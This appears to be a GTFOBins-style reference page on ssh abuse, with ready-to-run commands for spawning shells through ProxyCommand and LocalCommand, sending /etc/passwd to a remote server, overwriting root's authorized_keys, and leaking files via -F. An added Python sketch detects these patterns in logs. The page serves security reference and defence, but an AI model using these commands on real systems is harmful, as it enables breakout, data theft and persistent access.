It can be used to break out from restricted environments by spawning an interactive system shell.

Spawn interactive shell on client. Does not require a successful connection.

    ssh -o ProxyCommand=';sh 0<&2 1>&2' host

Spawn interactive shell on client. Requires a successful connection towards host.

    ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host

It can be used to break out from the intended program by running non-interactive system commands.

Does not require a successful connection.

    ssh -o ProxyCommand=';uname -a 1>&2' host

It can exfiltrate files on the network.

Sends a local file (/etc/passwd) to a remote SSH server and saves it in a location (/tmp/out).

    ssh host "cat > /tmp/out" < /etc/passwd

It can download remote files.

Retrieves a remote file from an SSH server (/tmp/infile) and saves it to a local destination (/root/.ssh/authorized_keys).

    ssh host "cat /tmp/infile" > /root/.ssh/authorized_keys

It reads data from files and may be used to do privileged reads or disclose files outside a restricted file system.

Reads a file and outputs it in an error message.

    ssh -F /etc/passwd host
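
A defender's view of the option-based entries above, as an added example that is not part of the original page: a sketch that scans logged ssh command lines for ProxyCommand, LocalCommand/PermitLocalCommand and -F usage. The trusted config locations, the %h heuristic and the finding labels are assumptions of this sketch, and the last two sample lines are constructed.

```python
import re
import shlex

# Assumption for this sketch: legitimate -F config files live under these paths.
TRUSTED_CONFIG_MARKERS = ("/etc/ssh/", "/.ssh/")

def ssh_findings(cmdline):
    """Return finding labels for one logged ssh command line (e.g. from execve auditing)."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return []
    findings, i = [], 1
    while i < len(argv):
        arg = argv[i]
        if arg in ("-o", "-F") and i + 1 < len(argv):
            flag, value = arg, argv[i + 1]      # separate form: -o Key=val
            i += 2
        elif arg[:2] in ("-o", "-F") and len(arg) > 2:
            flag, value = arg[:2], arg[2:]      # joined form: -oKey=val
            i += 1
        else:
            i += 1
            continue
        if flag == "-F":
            # A path outside the usual locations is parsed as config; its lines surface in errors.
            if not any(m in value for m in TRUSTED_CONFIG_MARKERS):
                findings.append("config-read:" + value)
            continue
        # -o accepts "Key=value" or "Key value"; keywords are case-insensitive.
        parts = re.split(r"\s*[=\s]\s*", value, maxsplit=1)
        key = parts[0].lower()
        val = parts[1] if len(parts) > 1 else ""
        if key == "proxycommand" and val.lower() != "none" and "%h" not in val:
            findings.append("proxycommand-without-%h")  # heuristic: not proxying to the host
        elif key == "localcommand":
            findings.append("localcommand")
        elif key == "permitlocalcommand" and val.lower() == "yes":
            findings.append("permitlocalcommand")
    return findings

# The first three lines are the page's commands; the last two are constructed benign samples.
SAMPLES = [
    "ssh -o ProxyCommand=';sh 0<&2 1>&2' host",
    "ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host",
    "ssh -F /etc/passwd host",
    "ssh -o ProxyCommand='ssh -W %h:%p bastion' host",
    "ssh -F /home/alice/.ssh/config host",
]
```

The file-transfer entries use no special options, so they need a different signal, such as ssh running with stdin or stdout redirected to a sensitive path.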